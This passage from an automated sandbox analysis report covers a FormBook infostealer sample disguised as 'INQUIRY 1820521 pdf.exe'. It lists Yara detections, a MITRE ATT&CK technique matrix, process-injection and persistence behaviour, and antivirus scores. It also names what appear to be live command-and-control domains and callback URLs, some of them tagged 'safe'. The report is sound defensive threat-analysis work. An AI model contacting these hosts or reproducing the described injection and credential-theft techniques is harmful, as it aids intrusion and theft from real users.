          YuGothR.ttc, YuGothM.ttc, YuGothL.ttc, YuGothB.ttc, holomdl2.ttf, CENTURY.TTF, LEELAWAD.TTF, LEELAWDB.TTF, MSUIGHUR.TTF, MSUIGHUB.TTF,
          WINGDNG2.TTF, WINGDNG3.TTF, TEMPSITC.TTF, PRISTINA.TTF, PAPYRUS.TTF, MISTRAL.TTF, LHANDW.TTF, ITCKRIST.TTF, JUICE___.TTF,
          FRSCRIPT.TTF, FREESCPT.TTF, BRADHITC.TTF, OUTLOOK.TTF, BKANT.TTF, ANTQUAI.TTF, ANTQUAB.TTF, ANTQUABI.TTF,
          GARA.TTF, GARAIT.TTF, GARABD.TTF, MTCORSVA.TTF, GOTHIC.TTF, GOTHICI.TTF, GOTHICB.TTF, GOTHICBI.TTF,
          ALGER.TTF, BASKVILL.TTF, BAUHS93.TTF, BELL.TTF, BELLI.TTF, BELLB.TTF, BRLNSR.TTF, BRLNSDB.TTF, BRLNSB.TTF, BERNHC.TTF,
          BOD_PSTC.TTF, BRITANIC.TTF, BROADW.TTF, BRUSHSCI.TTF, CALIFR.TTF, CALIFI.TTF, CALIFB.TTF, CENTAUR.TTF, CHILLER.TTF, COLONNA.TTF,
          COOPBL.TTF, FTLTLT.TTF, HARLOWSI.TTF, HARNGTON.TTF, HTOWERT.TTF, HTOWERTI.TTF, JOKERMAN.TTF, KUNSTLER.TTF
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match  File source: 00000009.00000002.727064011.00000000013C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match  File source: 00000009.00000002.725306924.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match  File source: 00000010.00000002.907270065.0000000000A00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match  File source: 00000009.00000002.727127963.00000000013F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match  File source: 00000010.00000002.907534755.0000000000B20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match  File source: 00000000.00000002.682219673.000000000492C000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match  File source: 00000010.00000002.908039234.0000000002C80000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match  File source: 9.2.INQUIRY 1820521 pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match  File source: 9.2.INQUIRY 1820521 pdf.exe.400000.0.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match  File source: 00000009.00000002.727064011.00000000013C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match  File source: 00000009.00000002.725306924.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match  File source: 00000010.00000002.907270065.0000000000A00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match  File source: 00000009.00000002.727127963.00000000013F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match  File source: 00000010.00000002.907534755.0000000000B20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match  File source: 00000000.00000002.682219673.000000000492C000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match  File source: 00000010.00000002.908039234.0000000002C80000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match  File source: 9.2.INQUIRY 1820521 pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match  File source: 9.2.INQUIRY 1820521 pdf.exe.400000.0.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Scheduled Task/Job1 | Scheduled Task/Job1 | Process Injection612 | Rootkit1 | Credential API Hooking1 | Security Software Discovery331 | Remote Services | Credential API Hooking1 | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Shared Modules1 | Boot or Logon Initialization Scripts | Scheduled Task/Job1 | Masquerading1 | Input Capture1 | Process Discovery2 | Remote Desktop Protocol | Input Capture1 | Exfiltration Over Bluetooth | Ingress Tool Transfer2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools1 | Security Account Manager | Virtualization/Sandbox Evasion41 | SMB/Windows Admin Shares | Archive Collected Data1 | Automated Exfiltration | Non-Application Layer Protocol2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Virtualization/Sandbox Evasion41 | NTDS | Remote System Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol12 | SIM Card Swap | Carrier Billing Fraud |
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Process Injection612 | LSA Secrets | System Network Configuration Discovery1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Deobfuscate/Decode Files or Information1 | Cached Domain Credentials | File and Directory Discovery1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Obfuscated Files or Information4 | DCSync | System Information Discovery112 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Software Packing3 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue |

          Behavior Graph

          Behavior Graph ID: 385289  Sample: INQUIRY 1820521 pdf.exe  Start date: 12/04/2021  Architecture: WINDOWS  Score: 100

          Start
            Signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for dropped file; 9 other signatures
            started: INQUIRY 1820521 pdf.exe
              dropped: C:\Users\user\AppData\...\YAhcdYrYHFkNNf.exe (PE32)
              dropped: C:\Users\user\AppData\Local\...\tmp7085.tmp (XML)
              dropped: C:\Users\user\...\INQUIRY 1820521 pdf.exe.log (ASCII)
              Signatures: Injects a PE file into a foreign processes
              started: INQUIRY 1820521 pdf.exe
                Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
                injected: explorer.exe
                  DNS/IP: hhcuerkn.com 210.152.87.233, 49732, 80, IDCFIDCFrontierIncJP, Japan
                  DNS/IP: www.xinghai-nb.com 104.21.82.58, 49745, 80, CLOUDFLARENETUS, United States
                  DNS/IP: 3 other IPs or domains
                  Signatures: System process connects to network (likely due to code injection or exploit); Uses ipconfig to lookup or modify the Windows network settings
                  started: ipconfig.exe
                    Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                    started: cmd.exe
                      started: conhost.exe
                  started: autochk.exe
              started: schtasks.exe
                started: conhost.exe
              started: INQUIRY 1820521 pdf.exe
              started: 2 other processes

          Screenshots


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          INQUIRY 1820521 pdf.exe | 39% | Virustotal |
          INQUIRY 1820521 pdf.exe | 19% | Metadefender |
          INQUIRY 1820521 pdf.exe | 41% | ReversingLabs | ByteCode-MSIL.Spyware.Noon

          Dropped Files

          Source | Detection | Scanner | Label
          C:\Users\user\AppData\Roaming\YAhcdYrYHFkNNf.exe | 19% | Metadefender |
          C:\Users\user\AppData\Roaming\YAhcdYrYHFkNNf.exe | 41% | ReversingLabs | ByteCode-MSIL.Spyware.Noon

          Unpacked PE Files

          Source | Detection | Scanner | Label
          9.2.INQUIRY 1820521 pdf.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          Source | Detection | Scanner | Label
          hhcuerkn.com | 0% | Virustotal |

          URLs

          Source | Detection | Scanner | Label
          http://www.founder.com.cn/cnP | 0% | Avira URL Cloud | safe
          http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
          http://www.mobcitylabs.com/gnk/?sZvD88=SYZO30Rw9/xWTIeSKGPhX7HmTPZweoUXDGzJY+4zU//Zy+/I+iT+Zq6wGsmgWs8tlcqs&Ezr0pl=DnbLuT | 0% | Avira URL Cloud | safe
          http://www.goodfont.co.kr-e | 0% | Avira URL Cloud | safe
          http://www.carterandcone.comTCV | 0% | Avira URL Cloud | safe
          http://www.hhcuerkn.com/gnk/?Ezr0pl=DnbLuT&sZvD88=H+m5DnQ6CNrLWDhOr9+GU7qZReU4k+N7/cnPpyZ0AIPp8Rivccl87rPwP+687pRYxKR0 | 0% | Avira URL Cloud | safe
          http://www.tiro.com | 0% | URL Reputation | safe
          http://www.tiro.com | 0% | URL Reputation | safe
          http://www.tiro.com | 0% | URL Reputation | safe
          http://weather.gc.ca/astro/seeing_e.html) | 0% | Avira URL Cloud | safe
          http://www.goodfont.co.kr | 0% | URL Reputation | safe
          http://www.goodfont.co.kr | 0% | URL Reputation | safe
          http://www.goodfont.co.kr | 0% | URL Reputation | safe
          http://www.carterandcone.com | 0% | URL Reputation | safe
          http://www.carterandcone.com | 0% | URL Reputation | safe
          http://www.carterandcone.com | 0% | URL Reputation | safe
          http://www.monotype.5;M | 0% | Avira URL Cloud | safe
          http://www.founder.com.cn/cnD | 0% | Avira URL Cloud | safe
          http://www.sajatypeworks.com | 0% | URL Reputation | safe
          http://www.sajatypeworks.com | 0% | URL Reputation | safe
          http://www.sajatypeworks.com | 0% | URL Reputation | safe
          http://www.typography.netD | 0% | URL Reputation | safe
          http://www.typography.netD | 0% | URL Reputation | safe
          http://www.typography.netD | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
          http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
